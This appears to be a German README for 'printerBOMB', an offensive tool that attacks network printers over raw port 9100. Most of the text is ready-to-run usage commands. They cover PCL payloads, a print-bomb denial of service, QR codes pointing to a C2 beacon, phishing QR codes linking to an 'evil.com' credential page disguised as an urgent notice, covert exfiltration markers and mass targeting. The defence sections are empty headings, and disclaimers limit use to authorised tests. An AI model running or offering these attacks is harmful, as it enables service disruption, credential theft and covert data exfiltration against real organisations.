
Printer-Exploitation-Framework für Sicherheitstests über den Rohport 9100, mit PCL-Payload-Zustellung, DoS-Bombing, C2-QR-Codes, Phishing-QR-Codes und verdeckten Exfiltrationsmarkern.
____ _ _ _____ _ _ ___
| _ \| | | | | __ \ | \ | | _|
| |_) | | __ | | __ | |__) | __ | \| | | _
| _ <| | / _| | |/ / | ___/ ' \| . ` | | (_)
| |_) | | \_| | < | | | (_) | |\ | |___ |
|____/|_| \__ |_|\_\|_| \___/|_| \_|_____|
_ _ | |
| | | | | |
| |_| | | |
\___/ |_|
______
|______|
| |
|______|
🖨️ printerBOMB - Framework für Drucker-Spooling-Angriffe
Ausnutzung des übersehenen Angriffsvektors: Ihre Netzwerkdrucker
Entwickelt von: Azhari Ramadhan 🔥
PrintHack ist ein hochentwickeltes Tool zur Drucker-Exploitation, das für Sicherheitsexperten, Red Teams und Penetrationstester entwickelt wurde. Dieses Tool nutzt das rohe Drucker-Spooling-Protokoll (Port 9100), um Sicherheitsbewertungen durchzuführen, Druckerschwachstellen zu testen und realistische Angriffsszenarien zu simulieren.
⚠️ HAFTUNGSAUSSCHLUSS: Dieses Tool ist ausschließlich für legitime Sicherheitstests und Bildungszwecke bestimmt. Verwenden Sie es verantwortungsvoll und nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung besitzen.
git clone https://github.com/AzhariRamadhan/CVE-PORT-9100.git
cd CVE-PORT-9100
pip install -r requirements.txt
Pillow - Bildverarbeitungqrcode - QR-Code-Generierungrequests - HTTP-Anfragenpip install Pillow qrcode requests
# Druckerkonnektivität testen
python3 printerhack.py -t 192.168.1.100 --check
# Testseite senden
python3 printerhack.py -t 192.168.1.100 --test
# Benutzerdefinierte Nachricht drucken
python3 printerhack.py -t 192.168.1.100 -m "Hallo vom Red Team!"
# Bild von URL drucken (in ASCII konvertiert)
python3 printerhack.py -t 192.168.1.100 -i http://example.com/image.png
# PCL-Payload senden
python3 printerhack.py -t 192.168.1.100 --pcl
# Print Bomb (DoS - 10MB)
python3 printerhack.py -t 192.168.1.100 --bomb 10
# C2-Callback-QR-Code drucken
python3 printerhack.py -t 192.168.1.100 --c2 "http://c2-server:8080/beacon"
# Phishing-QR-Code drucken
python3 printerhack.py -t 192.168.1.100 --phish "http://evil.com/login" "DRINGEND: Verifizieren Sie Ihre Anmeldedaten"
# Auf mehrere Drucker aus Datei drucken
echo -e "192.168.1.100\n192.168.1.101\n192.168.1.102" > targets.txt
python3 printerhack.py -f targets.txt -m "Sicherheitstest-Nachricht"
Drucken Sie verdeckte Nachrichten oder Anweisungen auf kompromittierte Drucker in Szenarien mit physischem Zugriff.
Drucken Sie QR-Codes, die auf Seiten zur Erfassung von Anmeldedaten verlinken, getarnt als Sicherheitshinweise.
Nutzen Sie die Druckerausgabe als verdeckten Exfiltrationskanal für kodierte Daten.
Testen Sie die organisatorische Resilienz gegen druckerbasierte Denial-of-Service-Angriffe.
Ermitteln und identifizieren Sie Drucker im gesamten Netzwerk.
Erkennungsindikatoren:
Abwehrstrategien:
DIESES TOOL WIRD "WIE BESEHEN" NUR FÜR LEGITIME SICHERHEITSTESTS BEREITGESTELLT.
DER AUTOR HAFTET NICHT FÜR JEGLICHEN MISSBRAUCH DIESES TOOLS.
HOLEN SIE IMMER eine schriftliche Genehmigung ein, bevor Sie ein System testen.
Unbefugte Nutzung kann gegen den Computer Fraud and Abuse Act (CFAA)
und ähnliche Gesetze in Ihrer Rechtsordnung verstoßen.
Entwickelt von: Azhari Ramadhan
Beiträge sind willkommen! Bitte stellen Sie sicher:
Entwickler: Azhari Ramadhan 🔥
MIT-Lizenz - Siehe LICENSE für Details
🖨️ printerBOMB - Ausnutzung der letzten Verteidigungslinie
Bleiben Sie den Angreifern voraus, indem Sie wie sie denken
Mit 🔥 erstellt von Azhari Ramadhan
| Funktion | Beschreibung |
|---|
--check | Druckerkonnektivität testen |
--test | Testseite senden |
--message | Benutzerdefinierte Payloads drucken |
--image | Bild von URL drucken (ASCII-Kunst) |
--pcl | PCL-formatierten Payload senden |
--bomb | DoS-Angriff (massiver Payload) |
--c2 | C2-Callback-QR-Code drucken |
--phish | Phishing-QR-Code drucken |
--exfil | Datenexfiltrationsmarker drucken |
--file | Massendruck auf mehrere Ziele |